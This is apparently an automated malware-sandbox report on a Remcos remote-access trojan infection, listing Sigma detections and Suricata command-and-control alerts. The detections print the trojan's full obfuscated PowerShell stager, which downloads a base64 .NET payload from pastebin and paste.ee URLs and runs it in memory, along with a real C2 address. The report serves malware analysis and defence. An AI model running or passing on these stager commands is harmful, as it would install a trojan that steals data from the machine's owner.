                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Sigma detected: Suspicious Execution of Powershell with Base64
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 980, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", ProcessId: 5480, ProcessName: wscript.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7372, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T07:41:19.521177+010020204231Exploit Kit Activity Detected188.114.97.3443192.168.2.449736TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T07:41:19.521177+010020204251Exploit Kit Activity Detected188.114.97.3443192.168.2.449736TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T07:41:22.031540+010020327761Malware Command and Control Activity Detected192.168.2.449741181.236.112.1692001TCP
                    2024-10-31T07:41:23.610045+010020327761Malware Command and Control Activity Detected192.168.2.449742181.236.112.1692001TCP
                    2024-10-31T07:41:25.190506+010020327761Malware Command and Control Activity Detected192.168.2.449743181.236.112.1692001TCP
                    2024-10-31T07:41:26.756293+010020327761Malware Command and Control Activity Detected192.168.2.449744181.236.112.1692001TCP
                    2024-10-31T07:41:28.312938+010020327761Malware Command and Control Activity Detected192.168.2.449745181.236.112.1692001TCP
                    2024-10-31T07:41:29.875749+010020327761Malware Command and Control Activity Detected192.168.2.449746181.236.112.1692001TCP
                    2024-10-31T07:41:31.453622+010020327761Malware Command and Control Activity Detected192.168.2.449747181.236.112.1692001TCP
                    2024-10-31T07:41:33.953405+010020327761Malware Command and Control Activity Detected192.168.2.449748181.236.112.1692001TCP
                    2024-10-31T07:41:35.531715+010020327761Malware Command and Control Activity Detected192.168.2.449749181.236.112.1692001TCP
                    2024-10-31T07:41:37.109960+010020327761Malware Command and Control Activity Detected192.168.2.449750181.236.112.1692001TCP
                    2024-10-31T07:41:38.675448+010020327761Malware Command and Control Activity Detected192.168.2.449751181.236.112.1692001TCP
                    2024-10-31T07:41:40.234871+010020327761Malware Command and Control Activity Detected192.168.2.449752181.236.112.1692001TCP
                    2024-10-31T07:41:41.817111+010020327761Malware Command and Control Activity Detected192.168.2.449753181.236.112.1692001TCP
                    2024-10-31T07:41:43.391319+010020327761Malware Command and Control Activity Detected192.168.2.449754181.236.112.1692001TCP
                    2024-10-31T07:41:44.969400+010020327761Malware Command and Control Activity Detected192.168.2.449755181.236.112.1692001TCP
                    2024-10-31T07:41:46.532179+010020327761Malware Command and Control Activity Detected192.168.2.449756181.236.112.1692001TCP
                    2024-10-31T07:41:48.095206+010020327761Malware Command and Control Activity Detected192.168.2.449757181.236.112.1692001TCP
                    2024-10-31T07:41:49.656958+010020327761Malware Command and Control Activity Detected192.168.2.449758181.236.112.1692001TCP
                    2024-10-31T07:41:51.220517+010020327761Malware Command and Control Activity Detected192.168.2.449759181.236.112.1692001TCP
                    2024-10-31T07:41:52.815631+010020327761Malware Command and Control Activity Detected192.168.2.449760181.236.112.1692001TCP
                    2024-10-31T07:41:54.375581+010020327761Malware Command and Control Activity Detected192.168.2.449761181.236.112.1692001TCP
                    2024-10-31T07:41:55.937978+010020327761Malware Command and Control Activity Detected192.168.2.449762181.236.112.1692001TCP
                    2024-10-31T07:41:57.672426+010020327761Malware Command and Control Activity Detected192.168.2.449764181.236.112.1692001TCP
                    2024-10-31T07:41:59.250597+010020327761Malware Command and Control Activity Detected192.168.2.449766181.236.112.1692001TCP
                    2024-10-31T07:42:00.815279+010020327761Malware Command and Control Activity Detected192.168.2.449777181.236.112.1692001TCP
                    2024-10-31T07:42:02.376348+010020327761Malware Command and Control Activity Detected192.168.2.449783181.236.112.1692001TCP
                    2024-10-31T07:42:03.938417+010020327761Malware Command and Control Activity Detected192.168.2.449794181.236.112.1692001TCP
                    2024-10-31T07:42:05.500475+010020327761Malware Command and Control Activity Detected192.168.2.449805181.236.112.1692001TCP
                    2024-10-31T07:42:07.079178+010020327761Malware Command and Control Activity Detected192.168.2.449816181.236.112.1692001TCP
                    2024-10-31T07:42:08.657245+010020327761Malware Command and Control Activity Detected192.168.2.449824181.236.112.1692001TCP
                    2024-10-31T07:42:10.238744+010020327761Malware Command and Control Activity Detected192.168.2.449833181.236.112.1692001TCP
                    2024-10-31T07:42:11.813179+010020327761Malware Command and Control Activity Detected192.168.2.449844181.236.112.1692001TCP
                    2024-10-31T07:42:13.377766+010020327761Malware Command and Control Activity Detected192.168.2.449853181.236.112.1692001TCP
                    2024-10-31T07:42:14.938356+010020327761Malware Command and Control Activity Detected192.168.2.449861181.236.112.1692001TCP
                    2024-10-31T07:42:16.438779+010020327761Malware Command and Control Activity Detected192.168.2.449872181.236.112.1692001TCP
                    2024-10-31T07:42:17.918640+010020327761Malware Command and Control Activity Detected192.168.2.449881181.236.112.1692001TCP
                    2024-10-31T07:42:19.344349+010020327761Malware Command and Control Activity Detected192.168.2.449889181.236.112.1692001TCP
                    2024-10-31T07:42:20.766372+010020327761Malware Command and Control Activity Detected192.168.2.449899181.236.112.1692001TCP
                    2024-10-31T07:42:22.244555+010020327761Malware Command and Control Activity Detected192.168.2.449910181.236.112.1692001TCP
                    2024-10-31T07:42:23.625678+010020327761Malware Command and Control Activity Detected192.168.2.449917181.236.112.1692001TCP
                    2024-10-31T07:42:24.962289+010020327761Malware Command and Control Activity Detected192.168.2.449923181.236.112.1692001TCP
                    2024-10-31T07:42:26.266463+010020327761Malware Command and Control Activity Detected192.168.2.449934181.236.112.1692001TCP
                    2024-10-31T07:42:27.570771+010020327761Malware Command and Control Activity Detected192.168.2.449940181.236.112.1692001TCP
                    2024-10-31T07:42:28.844251+010020327761Malware Command and Control Activity Detected192.168.2.449951181.236.112.1692001TCP
                    2024-10-31T07:42:30.076346+010020327761Malware Command and Control Activity Detected192.168.2.449957181.236.112.1692001TCP
                    2024-10-31T07:42:31.297618+010020327761Malware Command and Control Activity Detected192.168.2.449965181.236.112.1692001TCP
                    2024-10-31T07:42:32.485126+010020327761Malware Command and Control Activity Detected192.168.2.449974181.236.112.1692001TCP
                    2024-10-31T07:42:33.657910+010020327761Malware Command and Control Activity Detected192.168.2.449980181.236.112.1692001TCP
                    2024-10-31T07:42:34.813151+010020327761Malware Command and Control Activity Detected192.168.2.449989181.236.112.1692001TCP
                    2024-10-31T07:42:35.954553+010020327761Malware Command and Control Activity Detected192.168.2.449997181.236.112.1692001TCP
                    2024-10-31T07:42:37.063222+010020327761Malware Command and Control Activity Detected192.168.2.450003181.236.112.1692001TCP
                    2024-10-31T07:42:38.157818+010020327761Malware Command and Control Activity Detected192.168.2.450009181.236.112.1692001TCP
                    2024-10-31T07:42:39.219852+010020327761Malware Command and Control Activity Detected192.168.2.450018181.236.112.1692001TCP
                    2024-10-31T07:42:40.270568+010020327761Malware Command and Control Activity Detected192.168.2.450026181.236.112.1692001TCP
                    2024-10-31T07:42:41.314003+010020327761Malware Command and Control Activity Detected192.168.2.450032181.236.112.1692001TCP
                    2024-10-31T07:42:42.344399+010020327761Malware Command and Control Activity Detected192.168.2.450038181.236.112.1692001TCP
                    2024-10-31T07:42:43.385290+010020327761Malware Command and Control Activity Detected192.168.2.450044181.236.112.1692001TCP
                    2024-10-31T07:42:44.375625+010020327761Malware Command and Control Activity Detected192.168.2.450051181.236.112.1692001TCP
                    2024-10-31T07:42:45.359620+010020327761Malware Command and Control Activity Detected192.168.2.450058181.236.112.1692001TCP
                    2024-10-31T07:42:46.329576+010020327761Malware Command and Control Activity Detected192.168.2.450064181.236.112.1692001TCP
                    2024-10-31T07:42:47.287882+010020327761Malware Command and Control Activity Detected192.168.2.450067181.236.112.1692001TCP
                    2024-10-31T07:42:48.219436+010020327761Malware Command and Control Activity Detected192.168.2.450068181.236.112.1692001TCP
                    2024-10-31T07:42:49.141592+010020327761Malware Command and Control Activity Detected192.168.2.450069181.236.112.1692001TCP
                    2024-10-31T07:42:50.063925+010020327761Malware Command and Control Activity Detected192.168.2.450070181.236.112.1692001TCP
                    2024-10-31T07:42:50.970039+010020327761Malware Command and Control Activity Detected192.168.2.450071181.236.112.1692001TCP
                    2024-10-31T07:42:51.875778+010020327761Malware Command and Control Activity Detected192.168.2.450072181.236.112.1692001TCP
                    2024-10-31T07:42:52.780861+010020327761Malware Command and Control Activity Detected192.168.2.450073181.236.112.1692001TCP
                    2024-10-31T07:42:53.641839+010020327761Malware Command and Control Activity Detected192.168.2.450074181.236.112.1692001TCP
                    2024-10-31T07:42:54.518547+010020327761Malware Command and Control Activity Detected192.168.2.450075181.236.112.1692001TCP
                    2024-10-31T07:42:55.398388+010020327761Malware Command and Control Activity Detected192.168.2.450076181.236.112.1692001TCP
                    2024-10-31T07:42:56.235002+010020327761Malware Command and Control Activity Detected192.168.2.450077181.236.112.1692001TCP
                    2024-10-31T07:42:57.176751+010020327761Malware Command and Control Activity Detected192.168.2.450078181.236.112.1692001TCP
                    2024-10-31T07:42:58.020953+010020327761Malware Command and Control Activity Detected192.168.2.450079181.236.112.1692001TCP
                    2024-10-31T07:42:58.829009+010020327761Malware Command and Control Activity Detected192.168.2.450080181.236.112.1692001TCP
                    2024-10-31T07:42:59.783941+010020327761Malware Command and Control Activity Detected192.168.2.450081181.236.112.1692001TCP
                    2024-10-31T07:43:00.580874+010020327761Malware Command and Control Activity Detected192.168.2.450082181.236.112.1692001TCP
                    2024-10-31T07:43:01.380012+010020327761Malware Command and Control Activity Detected192.168.2.450083181.236.112.1692001TCP
                    2024-10-31T07:43:02.178849+010020327761Malware Command and Control Activity Detected192.168.2.450084181.236.112.1692001TCP
                    2024-10-31T07:43:02.970527+010020327761Malware Command and Control Activity Detected192.168.2.450085181.236.112.1692001TCP
                    2024-10-31T07:43:03.737488+010020327761Malware Command and Control Activity Detected192.168.2.450086181.236.112.1692001TCP
                    2024-10-31T07:43:04.500479+010020327761Malware Command and Control Activity Detected192.168.2.450087181.236.112.1692001TCP
                    2024-10-31T07:43:05.470561+010020327761Malware Command and Control Activity Detected192.168.2.450088181.236.112.1692001TCP
                    2024-10-31T07:43:06.222550+010020327761Malware Command and Control Activity Detected192.168.2.450089181.236.112.1692001TCP
                    2024-10-31T07:43:06.974546+010020327761Malware Command and Control Activity Detected192.168.2.450090181.236.112.1692001TCP
                    2024-10-31T07:43:07.703876+010020327761Malware Command and Control Activity Detected192.168.2.450091181.236.112.1692001TCP
                    2024-10-31T07:43:08.442565+010020327761Malware Command and Control Activity Detected192.168.2.450092181.236.112.1692001TCP
